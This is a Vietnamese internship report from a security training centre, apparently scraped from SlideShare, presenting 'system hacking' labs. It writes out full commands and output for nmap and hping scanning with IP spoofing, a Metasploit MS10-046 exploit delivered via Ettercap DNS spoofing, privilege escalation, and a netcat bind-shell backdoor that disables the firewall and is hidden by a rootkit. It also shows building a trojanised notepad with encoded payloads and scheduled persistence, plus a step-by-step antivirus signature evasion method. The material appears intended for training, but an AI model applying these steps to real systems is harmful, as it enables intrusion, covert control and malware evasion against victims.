SlideShare a Scribd company logo
1 of 105
Đề Tài Thực Tập
SYSTEM HACKING
Người Hướng Dẫn: Thầy Võ Đỗ Thắng
Người Thực Hiện Đề Tài: PHẠM HOÀNG HẢI
MỤC LỤC
I – Giới Thiệu
1.0 Giới thiệu về ATHENA……………………………3
1.1 Giới thiệu về System Hacking………………..........7
II – Nội Dung Thực Tập Tại ATHENA
2.0 Hướng dẫn cài VMware và BackTrack 5r3………...8
2.1 SCANNING……………………………………….25
2.2SYSTEM HACKING……………………………...64
2.3TROJAN…………………………………………...89
GIỚI THIỆU
1.0 – Giới Thiệu Về ATHENA
Lịch sử:
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc
Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí
thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh
vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa
công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước
nhà .
Lĩnh Vực Hoạt Hộng Chính:
+ Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn
quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI ,
CEH,... Song song đó, trung tâm ATHENA còn có những chương trình
đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ
Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính
phủ, tổ chức tài chính,…..
+ Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống
mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin -
Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu
điện các tỉnh,.....
+ Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều
chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại
học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân
Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn
thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......
Đội Ngũ Giảng Viên:
+Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các
trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều
phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP,
Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified
Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham
gia giảng dạy tại trung tâm ATHENA
+Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật
kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan,
Singapore,... và truyền đạt các công nghệ mới này trong các chương trình
đào tạo tại trung tâmATHENA
1.1 – Giới Thiệu Về System Hacking
Hiện nay, rất nhiều người sử dụng máy tính hệ điều hành Windows
như WIN XP, WIN 7 và các ứng dụng văn phòng như Microsoft Office
2003,2007,… cho công việc hang ngày.
Tuy nhiên những hệ điều hành trên và các ứng dụng Microsoft Office
đó sẽ có những lỗ hổng bảo mật.
Và các hacker sẽ lợi dụng điều đó để xâm nhập trái phép vào máy nạn
nhân để đánh cắp thông tin cũng như phá hoại.
Đề tài System Hacking này sẽ giúp các bạn hiểu được cách hacker
xâm nhập và khai thác các lỗ hổng trên như thế nào.
Và làm sao có thể khắc phục được các lỗ hổng và bảo vệ được máy
của mình nếu như có xâm nhập trái phép xảy ra.
NỘI DUNG THỰC TẬP
2.0 – Hướng dẫn cài VMware và BackTrack 5r3
Cài VMware:
Bước 1: Các bạn download phần mềm VMware worksations trên mạng
về và cài đặt như bình thường.
Bước 2: Thiết lập CẤU HÌNH MÁY ẢO cho phần mềm:
Chọn Create a new virtual Machine:
Chọn Next, rồi chọn i will install the operating system later
Chọn Next, chọn HDH mà bạn muốn cài, ở đây mình chọn WINXP
Chọn Next > chọn Browse để lưu file ( chọn ổ nào trống tầm 10G là đẹp ko
nhất thiết là ổ đĩa C )
Nhấn Next chọn dung lượng ổ cứng (cái này tùy mọi người chọn nhé )
Chọn Next > chọn custumize hardware, mục này nhiều cái hay lắm
Xong rùi chọn Close rồi chọn Finish là xong!
Bước 3: CÀI HỆ ĐIỀU HÀNH CHO MÁY ẢO
Cài trực tiếp từ đĩa winxp.iso,vào menu VM chọn settings chọn CD/DVD
chọn đường dẫn là đĩa winxp.iso cần cài:
Chọn OK rùi chọn nút màu xanh như hình dưới chọn power on để cài Win.
Quá trình cài windows y chang cài trên máy thật thế là xong
Cài BackTrack 5r3:
Nhập vào đoạn text sau để chuyển sang giao diện đồ họa [startx]
Click chọn install trên desktop để tiếp tục cài đặt các thông số như ngày giờ,
ổ đĩa và ngôn ngữ > Xong.
Nếu muốn sử dụng lệnh thì có thể mở Terminal.Hình màu đen ở thanh trên
cùng nhỏ nhỏ
SCANNING
Bài1: Nmap Scanning
1. Mục Đích:
- PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đã đượcinstall mặc
địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể
installtrênWindow vàLinux.
- Mụcđíchbàilab: sử dụngNmapđểxácđịnhcácthôngsố hệ điềuhành, port, dịchvụ
tươngứngvới…
- Nmaplà mộttrongnhững networkscannerrất hiệuquả.Thông quanmapta có
thểthực hiện quátrìnhscanvới cáckỹ thuậtkhácnhaunhư SYN scan,TCP
Connectionscan,Xmas scan,Null scan…
2. Cácbướcthựchiện
- Ta có thểsử dụngnmaphỗ giao diệnđồ họavàgiao diệndònglệnh. Giao diện
dòngđồ họasửdụng chươngtrìnhzendmap.Cònở giao diệndònglệnhthìta sử dụng
câulệnh nmap.
- Bước1:taxemgiúp đỡ của câulệnh NMAP
- Bước2:thựchiện quátrìnhpingsweep cho đường mạng192.168.1.0/24để
xácđịnhcác hostđang có trongđường mạng bằngcâulệnh“nmap -sP-v
172.16.34.1/24”
- Bước3:Ta cần xácđịnhxemở IP172.16.34.18đang có nhưngport nào đang
mở.Đểlàmviệcnày ta có thể sử dụngcácdạngscankhácnhau. Vídụở đây tasử
dụngkỹthuậtSYN scanvới câulệnh “nmap –sS172.16.34.18”
- Bước4:xácđịnhgiátrị porttrongquátrìnhscan. Mặcđịnhchươngtrìnhsẽ scantất
cảcác port. Ví dụtacần xácđịnh trongđườngmạng172.16.34.1/24 thìđang có
bao nhiêumáyđangmở port445,139,80,3389tacó thểsử dụng câulệnh “nmap-
sT -p 445,139,3389172.16.34.1/24”
- Bước5:Sử dụngnmapscanđường mạngvới IPPublic bên ngoài với câulệnh
“nmap -sS-p 80222.253.166.1/24> /root/Desktop/scan_adsl.txt” . Như vậy
kết quảscansẽđượcghi thànhfile scan_adsl.txt
- Bước6:Sử dụngnmapđểxácđịnhcác thôngsố của cácứng dụngđượctriển khai
trênserver. Ta sử dụng“nmap-p 1-65535-T4-A -v192.168.0.4”
- Bước7:Trong nmaphỗ trợ sử dụng các scriptsđểnscanmột lỗi ứng dụng nào đó.
Đầutiênta có thểsử dụng câu lệnh “locatenmap” đểxácđịnhcácfilescript
đangđượchỗ trợ trong nmap. Ví dụ ta cóthểsử dụngkiểm tralỗi ms08-067của
cácmáytrongđườngmạng“nmap -sT --script smb-check-vulns.nse -p 139,445
172.16.34.1/24”
Ngoài ra ta có thể kiểmtraxemtrongmạng có máy nào đangchuyểncard mạng
sangPromicious modeđểsniffertraffictrênđườngtruyền“nmap --script sniffer-
detect172.16.34.1/24”
- Bước8:Trong quátrìnhscanta nênthayđổi cácgiátrị IPsource,lưulượnggói tingửi
trongthời gian1giây, thực hiện phânmảnh gói tin,giảthôngsố ttl. Vídụ
tathựchiện câulệnh “nmap -sS-p 3389,445,139,23,22,80--max-rate 50-S
10.0.0.1192.168.1.78 -ttl 128-f-e eth0-Pn”
-sS :SYN Scan
-p:port
--max-rate:luuluong maximumpersecond
-f:fragment
-S:Spoofing IPaddress
-e:xac dinhinterface
-ttl:xac dinh giatri ttl (macdinh window la 128)
Bài 2:ScanningNmapThôngQuaProxyChains
1. Mục đích bài lab
- Sơđồ bàilabnhư sau:
192.168.1.0/24
- PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đã đượcinstall mặc
địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể
installtrênWindow vàLinux.
- Mụcđíchbàilab: tacấuhình côngcụproxychainlàmlocal proxy chươngtrình
nmap. Proxy chainsẽkết nốiđếnmột Proxy Server ngoài mạnginternet. Như
vậythì nmapsẽscan victimserverthông quamột proxy server.
2. Cácbướcthựchiện
- Bước1:Install và Configure Proxychains.Nếunhư máylinux ta chưacó install
Proxychains,tathựcthi câulệnhbên dưới
nhanld@nhanld-laptop:~$sudo su
[sudo]password for nhanld:
root@nhanld-laptop:/home/nhanld# apt-get installproxychains
Vịtrí file cấuhình cho proxychainstại /etc/proxychains.conf
nhanld@nhanld-laptop:~$gedit /etc/proxychains.conf
Tasẽbỏ dấu# trướcdòngstrict_chaintrongfile cấuhình.
Tìmkiếmmộtsố trangwebcungcấp proxyserver.Proxychains hỗ trợ cácphương
thứclà HTTPProxy,SOCK 4vàSOCK 5.Tacó thểdùngcáctừ khóađểtìmkiếm
trênGoogle“freeproxy server list” hoặc“freeproxy server listsock”
- CấuhìnhProxyChains hỗ trợ cácdạng Proxy. Vídụ,tasẽthêm mộtsố dòngvào
file/etc/proxychains.conf
http94.23.236.21780 http
83.216.184.132 8080
sock5203.206.173.41080
sock485.119.217.1131080
sock4201.55.119.431080
- Bước2:Install Nmaptừ Source. Tacó thểdownloadsourceNmaptừ
trangwebhttp://nmap.org/download.html. Thựchiệnquátrìnhinstall từ source,ta
chọninstall vào đường dẫnlà/opt/nmap
nhanld@nhanld-laptop:~$cd/home/nhanld/Download
nhanld@nhanld-laptop:~$tar xvfnmap-5.51.tar.bz2
nhanld@nhanld-laptop:~$cdnmap-5.51
nhanld@nhanld-laptop:~$mkdir /opt/nmap
nhanld@nhanld-laptop:~/Downloads/nmap-5.51$./configure–
prefix=/opt/nmap
nhanld@nhanld-laptop:~/Downloads/nmap-5.51$make
nhanld@nhanld-laptop:~/Downloads/nmap-5.51$sudo makeinstall
- Bước3:dùng Nmapscanthông quaProxychains. Đểthựchiện câulệnhscan
bằngtool nmapthông qua proxychains,ta nhậpvào câulệnh proxychains và
tiếptheolà câulệnhcủaNmap
root@nhanld-laptop:/home/nhanld/Downloads/nmap-5.51#proxychains
nmap -sS 27.0.12.130
ProxyChains-3.1(http://proxychains.sf.net)
StartingNmap 5.51( http://nmap.org) at 2011-06-1416:27ICT
Warning:File ./nmap-services exists, but Nmap is using
/opt/nmap/share/nmap/nmap-services for securityand consistency
reasons.set NMAPDIR=.togive priorityto files in your local directory
(may affect the other data filestoo).
Nmap scan report for mail.kaka.vn (27.0.12.130)
Host is up (0.11s latency).
Not shown:991closed ports
PORT STATE SERVICE
21/tcp openftp
42/tcp filtered nameserver
80/tcp openhttp
111/tcpopen rpcbind
135/tcpfiltered msrpc
139/tcpfiltered netbios-ssn
445/tcpfiltered microsoft-ds
3306/tcp open mysql
8888/tcp open sun-answerbook
Bài 3: Nessus Scanning
1. Mục đích bài lab
- Nessus Clientvà Serverta có thể sử dụngtrêncùng1 PC hoặctrên2PC. Máy
victimtrongbài Labsử dụnglà máy Window
- Nessuslà mộttrong những côngcụhỗ trợ adminscan các vulnerable của hệ
điềuhành, cácứngdụng… khátốt. Ngoài ra ta có thểsửdụngcáccôngcụ
khácnhư OpenVAS,GFILanguard
2. Cácbướcthựchiện
- Bước1:Đầutiên tasẽdownloadvàđăngkýActivation Codetại trangweb
http://www.tenable.com/products/nessus. Cácthao táccấuhìnhcủa
Nessussẽđượcthựchiệntrên nềngiao diệnweb.
- Bước2:Saukhicàiđặtxong,tasử dụngtrìnhduyệtwebkếtnối vào
https://localhost:8834đểđiềukhiểnNessus
- Bước3:Tiếptụcđịnh nghĩara usernamevà password
- Bước4:Nhậpvào ActivationCode
- Bước5:Sauđó chươngtrinhsẽ downloadvềcác Pluginđểsử dụngscan
Bước6:Cấu hìnhNessusscanvulnerable của hệđiềuhànhvàứng dụng. Cácbước
chínhtacần cấu hình:
oTạo Policyvà chọnphươngthứcscan.
oChọnđốitượngscan
oKiểmtrakết quảvà xuấtreport
ĐầutiêntaloginvàoNessusbằng cáchsử dụngđườnglink https://localhost:8834
Clickvào Policies, clickvào Add,địnhnghĩara một profilescan.Ở đâytađịnh
nghĩara profile có tênlàAthenaScan.
Nhậpvào usernamevà passwordxácthựcđểscan(ta có thểscanđượcnhiềulỗi
hơn)hoặctakhôngnhậpusernamevàpassword.
ChọnWindows:Microsoft Bullentinsđể scancác lỗi củahệđiềuhành Window.
Thôngtindatabasetađểmặcđịnh.
- Bước7:Tiếptụcta Clickvào SCANS,xácđịnhPolicylà AthenaScan,Scan
Target nhậpvào IP 192.168.1.236đểcấu hìnhcácđốitượng đểscan.
- Bước8:Cuối cùngta xemkết quảscanvàxuấtreport
Bài:Hpingscanning
1. Mục đích bài lab
- Sơđồ bàilabnhư sau:
- PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đãđượcinstall mặc
địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể
installtrênWindow vàLinux.
- Mụcđíchbàilab: sử dụngHpingđểxácđịnhcácthôngsố hệ điềuhành, port, dịchvụ
tươngứngvới. Ngoài ra Hpingcho phépta tạo ra nhữnggói tintheoý mìnhvà
dễdàngđiều chỉnh lưulượng
2. Cácbướcthựchiện
- Bước1:Hpinglà mộttrongnhững công cụ scantốt.Nó cho phéptatạo ra các gói
tintheoý muốn, điềuchỉnhsố lượnggói tingửi… Mặcđịnhhping2,hping3đượccàiđặt
mặcđịnhtrongBack Track5. Tacó thểxemgiúpđỡ bằng câulệnh “hping3--help”
-
Bước2:Sử dụnghpingđểgửistandardICMPpacketđến target. Bằng câulệnh
“hping3–icmp –c 4athena.edu.vn”
- Bước3:Tiếptheotasử dụnglại câulệnhở trênvà thêmvào 2 biến
o–dkíchthướcdatatronggói tin
o–Vhiển thịthôngtin đầyđủ
- Bước4:Sử dụng biến –jđểxemkếtquảoutput dạng hexa decimal
- Bước5:Sử dụnghping3gửiSYN packetđếnmột host. Tasẽthêmbiến–S và–
pđểxácđịnhgiátrịport25. Trênmàn hìnhtasẽnhậnđược4 packetvới“SA” flag. Với
giátrị SYN/ACK trảvềnghĩalà port này Open. Câulệnh ta phải nhập vào là“hping3 –
S–p 25–c 4 athena.edu.vn”
- Bước6:Attacker gửi ACK Probevới giátrịsequence numberrandom. Nếunhư
khôngcó packet response nghĩa là portđược filter (có stateful firewall).Nếu
RSTpacket reponsenghĩa là port khôngcó được filter (khôngcó firewall)Ta có
thểxácđịnhthêm giátrịsourceport cho câulệnh AckScanở trênbằng biến
–s. Ví dụtasẽnhậpvào câulệnh “hping3–A –p 25-s 5555–c4athena.edu.vn”
- Bước7:Ta có thểspoofing IPbằngbiến–a.Ví dụ tanhậpvào câulệnh như sau
“hping3-S-p 80-s 5555-a 192.168.1.121-c 10192.168.1.254”
Nếunhư tasửdụngwireshark capturetrafficthì sẽthấytrafficgiữa2IP
192.168.1.121và IP192.168.1.254
- Bước8:Đểscan cùng1lúc nhiều portthì tasẽsử dụngoption--scan[port cần scan].
Ví dụ“hping3 –S–scan 80,443,25,85-90–Vathena.edu.vn”
2.2 System Hacking
I. Mụ c tiêu bài lab
-Mô hìnhbàilab
- Mụcđíchbàilab: tasẽthử thựchiện tấn côngvào 1máyWindow XP (victim), sauđó
thựchiệnuploadNetcatBackdoorđểđiềukhiểnvictim, tiếptục tasử dụngcông cụ
Rootkitđểẩnđi process củanetcat
- Máyattacker sử dụng chươngtrìnhMetasploit đãđượccàiđặtsẵn.
II.Các bước thực hiện
1. Chuẩn bịMetasploit
- Tasử dụnglỗi shortcutMs10-046đểkhaitháclỗi,tasẽthực hiệnnhư sau:
root@bt:/pentest/exploits/framework3#msfconsole
msf >search lnk
msf>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf>set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader)>set LHOST192.168.1.10
LHOST =>192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader)>set SRVHOST192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader)>exploit -j
[*]Exploit runningas backgroundjob.
[*]Startedreverse handler on192.168.1.10:4444
[*]
[*]Sendvulnerable clientsto 192.168.1.10EPzSUxdEj.
[*] Or,get clientsto saveandrendertheiconof http://<your
host>/<anything>.lnk
[*]
[*]UsingURL:http://192.168.1.10:80/
[*]Server started.
- Bâygiờ làmsao đểclient connectvào server192.168.1.0. Tacó thểchọn giải
pháplà sử dụngDNS spoofing
2. Cấuhình EttercapDNS Spoofing
- Ta cấuhìnhfileetter.dns (/usr/share/ettercap/etter.dns)với IP củatrang
www.google.comlà IPcủaattacker 192.168.1.10bằng cáchthêmvào 2dòng sau
www.google.comA192.168.1.10
www.google.comPTR192.168.1.10
- Thựchiệnquátrình dns spoofing
Ettercap-T -q –Marp:remote–P dns_spoof –i eth0/192.168.1.11///
- Tại máy client nhậpvào trangweb www.google.comvà hiệnra mànhình giống
nhưbên dưới
3. Kiểmtra metasploit
- Metasploit trả ra chotacác dònglog nhưbêndưới
msf exploit(ms10_046_shortcut_icon_dllloader)>[*]Sending UNCredirectto
192.168.1.11:1655...
[*]SendingUNCredirectto 192.168.1.11:1655...
[*]Respondingto WebDAV OPTIONS requestfrom192.168.1.11:1660
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj
[*]Sending301for /EPzSUxdEj...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj/
[*]Sendingdirectory multistatus for /EPzSUxdEj/...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj
[*]Sending301for /EPzSUxdEj...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj/
[*]Sendingdirectory multistatus for /EPzSUxdEj/...
[*]ReceivedWebDAVPROPFINDrequest from192.168.1.11:1660/EPzSUxdEj
[*]Sending301for /EPzSUxdEj...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1660/EPzSUxdEj/
[*]Sendingdirectory multistatus for /EPzSUxdEj/...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1661/EPzSUxdEj
[*]Sending301for /EPzSUxdEj...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1661/EPzSUxdEj/
[*]Sendingdirectory multistatus for /EPzSUxdEj/...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663/EPzSUxdEj
[*]Sending301for /EPzSUxdEj...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663/EPzSUxdEj/
[*]Sendingdirectory multistatus for /EPzSUxdEj/...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663
/EPzSUxdEj/desktop.ini
[*]Sending404for /EPzSUxdEj/desktop.ini ...
[*]SendingLNK fileto 192.168.1.11:1663 ...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663
/EPzSUxdEj/vncuNN.dll.manifest
[*]Sending404for /EPzSUxdEj/vncuNN.dll.manifest...
[*]SendingDLLpayload192.168.1.11:1663...
[*]ReceivedWebDAVPROPFIND request from192.168.1.11:1663
/EPzSUxdEj/vncuNN.dll.123.Manifest
[*]Sending404for /EPzSUxdEj/vncuNN.dll.123.Manifest ...
[*]Sendingstage(752128bytes)to 192.168.1.11
[*]Meterpreter session 1opened (192.168.1.10:4444->192.168.1.11:1664)at
2011-07-2010:22:16 +0700
msf exploit(ms10_046_shortcut_icon_dllloader)>sessions-l
Active sessions
===============
IdType Information Connection
------ ----------- ----------
1 meterpreter x86/win32NHANLD-XPnhanld@ NHANLD-XP
192.168.1.10:4444-> 192.168.1.11:1664
msf exploit(ms10_046_shortcut_icon_dllloader)>sessions-i 1
[*]Startinginteractionwith1...
- Kiểmtra mộtsố thôngtincủamáyvictimvà nângquyền
meterpreter >getuid
Server username:NHANLD-XPnhanld
meterpreter>getprivs
=====================================================
======= EnabledProcess Privileges
=====================================================
======= SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter>getsystem
...gotsystem(via technique
1).meterpreter>getuid
Server username:NTAUTHORITYSYSTEM
4. Sử DụngNetcatlàmbackdoor vàhxdef100rootkit
- Ta chuẩn bi sẵnfilenc.exeđểupload. FilenàytrongBT5nằmtại vịtrí
/pentest/windows-binaries/tools
meterpreter>pwd
C:DOCUME~1nhanldLOCALS~1Te
mp meterpreter >cd
C:WINDOWSHelp meterpreter
>mkdirnetcat
Creating directory: netcat
meterpreter >cd netcat
meterpreter >pwd
C:WINDOWSHelpnetcat
meterpreter>upload/pente
st/windows-
binaries/tools/nc.exe
[*]uploading:
/pentest/windows-
binaries/tools/nc.exe ->.
[*]uploaded :/pentest/windows-binaries/tools/nc.exe ->.nc.exe
- Tasẽtạo ra mộtfile nc_scripts.bat có nộidungđơngiảnnhư sau
@echo off
netshfirewall setopmodedisable
nc.exe-l -v -p4444-e cmd.exe
- Tạo ra mộtfile nc_scripts.vbs có nội dungnhư sau
SetWshShell=CreateObject("WScript.Shell")
WshShell.Runchr(34)
&"C:WINDOWSHelpnetcatnc_scripts.bat"&Chr(34), 0
SetWshShell=Nothing
- Upload2file nàyvào máyvictim
meterpreter>upload/root/Desktop/nc_scripts.bat .
[*]uploading: /root/Desktop/nc_scripts.bat->.
[*]uploaded :/root/Desktop/nc_scripts.bat ->.nc_scripts.bat
meterpreter >upload/root/Desktop/nc_scripts.vbs .
[*]uploading: /root/Desktop/nc_scripts.vbs->.
[*]uploaded :/root/Desktop/nc_scripts.vbs->.nc_scripts.vbs
- Tasẽsử dụng metasploit upload2file nàyfolder vào C:WINDOWSHelp
- Tiếptục tasẽupload rootkit hxdef100:bao gồmmộtfilecấuhìnhvà mộtfile
thựcthi
+file cấuhìnhđểẩn process của chươngtrìnhnc.exevàfilethựcthi của
chươngtrình
meterpreter>upload/root/Desktop/hxdef100.ini .
[*]uploading: /root/Desktop/hxdef100.ini->.
[*]uploaded :/root/Desktop/hxdef100.ini->.hxdef100.ini
meterpreter >upload/root/Desktop/hxdef100.exe .
[*]uploading: /root/Desktop/hxdef100.exe->.
[*]uploaded :/root/Desktop/hxdef100.exe->.hxdef100.exe
- Start netcatbackdoor thông quanc_scripts.vbs(start2chươngtrìnhlà nc.exe
và cmd.exe)và rootkit
meterpreter >shell
Process 2868created.
Channel28 created.
MicrosoftWindows XP[Version5.1.2600]
(C) Copyright1985-2001Microsoft Corp.
C:WINDOWSHelpnetcat>start nc_scripts.vbs
start nc_scripts.vbs
- Kiểmtra portvà cáctiếntrìnhđang hoạtđộngtrongmáybằnglệnhnetstat–
ano vàtasklist thì tathấy portvà dịchvụ bấtthường
- Khởi độngrootkitđểẩnprocess nc.exevà ẩnđifilethựcthi củachươngtrình
netcat
C:WINDOWSHelpnetcat>start hxdef100.exe
start hxdef100.exe
- Takiểmtralại process thì thấytiến trìnhnc.exeđã đượcẩnđi.
- Attacker sử dụng chươngtrìnhtelnethoặcchươngtrìnhnetcat đểconnect
điềukhiểnmáyattacker
root@bt:/opt/framework3/msf3#telnet192.168.1.114444
Trying192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
MicrosoftWindows XP[Version5.1.2600]
(C) Copyright1985-2001Microsoft Corp.
C:WINDOWSHelpnetcat
>C:WINDOWSHelpnetca
t>
5. Tạo ra backdoor vàuploadbằng metasploit
- Ta chuẩn bị mộtfileđểghépbackdoor vào. Vídụtasử dụng chươngtrình
notepad.exe
- Sử dụng câulệnhsauđểtạo ra backdoor
root@bt:/opt/framework3/msf3# ./msfpayload
windows/meterpreter/reverse_tcp
LHOST=192.168.1.10LPORT=4455R |
./msfencode -e x86/shikata_ga_nai -c 3-t exe -x
/root/Desktop/NOTEPAD.EXE-
o /root/Desktop/backdoor_notepad.exe
[*]x86/shikata_ga_nai succeeded withsize317 (iteration=1)
[*]x86/shikata_ga_nai succeeded withsize344 (iteration=2)
[*]x86/shikata_ga_nai succeeded withsize371 (iteration=3)
- Trong metepreter tacó thểsử dụngcâulệnhrun schedulemeđểupload
backdoor và cho backdoor startupvới hệthống.
meterpreter>run scheduleme –h
Đểhiểnthị cácgiúp đỡ của câulệnh
meterpreter>run scheduleme -e /root/Desktop/backdoor_notepad.exe-s
[*]Uploading/root/Desktop/backdoor_notepad.exe....
[*]/root/Desktop/backdoor_notepad.exeuploaded!
[*]SchedulingcommandC:DOCUME~1nhanldLOCALS~1Tempsvhost72.exe
to runstartup.....
[*]Thescheduledtask has been successfully created
[*]For cleanuprunschtasks /delete/tn syscheck15 /F
- Lúcnàybackdoor notepadđãđượckíchhoạt,tatiếptụcsử dụngtính năng
multi/handlerđểchờ đợi kết nối củavictim
msf exploit(ms10_046_shortcut_icon_dllloader)>use exploit/multi/handler
msf exploit(handler) >set payload windows/meterpreter/reverse_tcp
payload=>windows/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST192.168.1.10
msf exploit(handler)>set LPORT4455
LPORT=>4455
msf exploit(handler)>exploit-j
[*]Exploit runningas backgroundjob.
- Restartlại máyvictim,lúc nàykếtnối màtađãsử dụngthông qualỗi ms10-046
đã bị mất. Sauđó victimtự độngtạo rareverser connectionđếnmáyvictim.msf
exploit(handler)>
[*]Sendingstage(752128bytes)to 192.168.1.11
[*]Meterpreter session3opened (192.168.1.10:4455 ->192.168.1.11:1025)at
2011-07-2012:08:20 +0700
- Nếunhư takiểmtradịchvụ và các kếtnối của máyclientthìtasẽthấyđiềubất
thườngở đâylà mộtdịchvụlạ xuất hiện
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
2.3 VIRUS TROJAN
Bài:By PassAnti Virus
I. Mục đích bài lab
- Hầuhết cácchươngtrìnhchốngvirus đều nhậndạngfilelà chươngtrình
độchạidựatrênsignature databaseđượcupdatethườngxuyên
- Cáccông cụcầnthiết cho bài lab. Các công cụ nàytacàiđặttrong1máy
tính
oDsplit:đượcsử dụngđểcắt cácfilethànhnhiềuphầnvớiđộ dàităng
dần.
oHex Editor:để sử dụng phân tích chươngtrìnhvàthayđổi các giátrị
trongfile
oChươngtrìnhscanvirus đểkiểmtra. Trongbài labnàytasẽsử dụng
chươngtrìnhAvast
o1FileđượccácchươngAVcảnhbáo. Trong bài labtasẽsử dụng
chươngtrình“IceGoldFreezer”
oCáccông cụscan virus onlineví dụnhư trangweb
www.virustotal.com
II. Cácbướcthựchiện
- Tathử scanfile“Ice GoldFreezer” bằngtrangweb www.virustotal.comthì
24/43chươngtrìnhnhậndạng đâylàMalware
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
- Copysource“IceGoldFreezer” vào folder chứasourcechươngtrìnhDsplit
tathựchiện quátrìnhcắtfilethành cácđoạnvà sử dụngAvastscancác file này.
Thông quaquátrìnhnàytasẽướclượngđượcsignature nhậnvirus sẽ nằmở phần
nào trongfile.
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
- Tasử dụngAvastscantất cảcác fileđãđượccắtra vàxácđịnh file nào bắt
đầutừ bytenào thì filebị nhận là Virus
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
- Theo kết quảmàn hìnhở trênthì từ byte thứ 102000thì chươngtrình
đượcnhận là virus. Taxóahết cácfileđã đượccắt nhỏ.
- Tiếptục tasẽkiểmtraxemtừ byte 101000đến 102000thì như thế nào ?
Tasử dụngkhoảngtănglà100 byte.
- Tascancác filevừa đượctạo ra bằngAvastmộtlầnnữa
- Kết quảthuđượclà từ file 101900đến 102000được nhận là virus.
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
- Tatiếptục kiểmtra phânđoạntừ 101800 đến 101900với khoảngtănglà
10byte và scan lại.
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
- Kết quảthuđượclà từ file 101820sẽ được nhận là virus.
- Tasẽtiếptục phântíchtừ file 101810 đến101820 với khoảngtănglà 1 byte
như thế nào ?
- Đếnđâythìtađãxácđịnhđượcbyte101819đượcxácđịnhlà có virus
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
- Tasẽthayđổi giátrị101819thành mộtgiátrịkhác. Ở đâytasẽđánhthêm vào
2lần phímspacebar.Ta sẽ thấyxuất hiện thêm 2giá trị hexa là2020 trên
màn hình.
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
